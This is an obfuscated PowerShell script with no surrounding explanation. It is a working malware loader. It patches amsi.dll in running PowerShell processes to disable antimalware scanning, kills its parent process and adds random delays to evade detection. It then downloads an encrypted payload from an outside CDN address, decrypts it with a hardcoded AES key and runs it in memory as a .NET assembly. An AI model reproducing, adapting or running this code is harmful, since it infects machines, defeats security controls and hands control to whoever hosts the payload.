$petal = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId if ($petal) { Stop-Process -Id $petal -Force } Add-Type @" using System; using System.Runtime.InteropServices; public class K { [DllImport("kernel32.dll", SetLastError=true)] public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r); [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(uint a, bool i, int p); [DllImport("kernel32.dll", SetLastError=true)] public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w); } "@ function KJhbhb { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $jungle = Get-Process -Name "powershell" -ErrorAction SilentlyContinue if (!$jungle) { exit 1 } foreach ($drift in $jungle) { Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $nova = [K]::OpenProcess(0x001F0FFF, $breeze, $drift.Id) $lantern = $null $jolt = 0 foreach ($path in $drift.Modules) { if ($path.ModuleName -eq "amsi.dll") { $lantern = $path.BaseAddress $jolt = $path.ModuleMemorySize break } } if (!$lantern) { continue } $gully = [byte[]]::new(32) $violet = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b) $grove = $null for ($ivy = 0; $ivy -le $jolt; $ivy += 32) { $marsh = [IntPtr]::Zero [K]::ReadProcessMemory($nova, [IntPtr]($lantern.ToInt64() + $ivy), $gully, 32, [ref]$marsh) $forest = $cove for ($willow = 0; $willow -lt 32; $willow++) { if ($gully[$willow] -ne $violet[$willow]) { $forest = $breeze; break } } if ($forest) { $grove = [IntPtr]($lantern.ToInt64() + $ivy); break } } if (!$grove) { continue } Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101) $lagoon = 0 [K]::VirtualProtectEx($nova, $lantern, 0x1000, 0x40, [ref]$lagoon) $blaze = [byte[]]@(0x31,0xff,0x90) $rubble = 0 [K]::WriteProcessMemory($nova, [IntPtr]($grove.ToInt64() + 0x1b), $blaze, 3, [ref]$rubble) } } KJhbhb #ujhifsfiohdf setx BUILD "Titan" $temple = "https://sdfas-cloud.b-cdn.net/wqegfasd.bin" $knob = [System.Net.WebClient]::new() $book = $knob.DownloadData($temple) $mountain = [System.Security.Cryptography.Aes]::Create() $yew = [System.Text.Encoding]::UTF8.GetBytes("X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0") $spire = [System.Text.Encoding]::UTF8.GetBytes("K9mW3pQ7tR2vL8nY") $mountain.Key = $yew $mountain.IV = $spire $pine = $mountain.CreateDecryptor() $haven = $pine.TransformFinalBlock($book, 0, $book.Length) $cypress = [System.Reflection.Assembly]::Load($haven) $desert = $cypress.EntryPoint $desert.Invoke($null, $null) #ujhifsfiohdf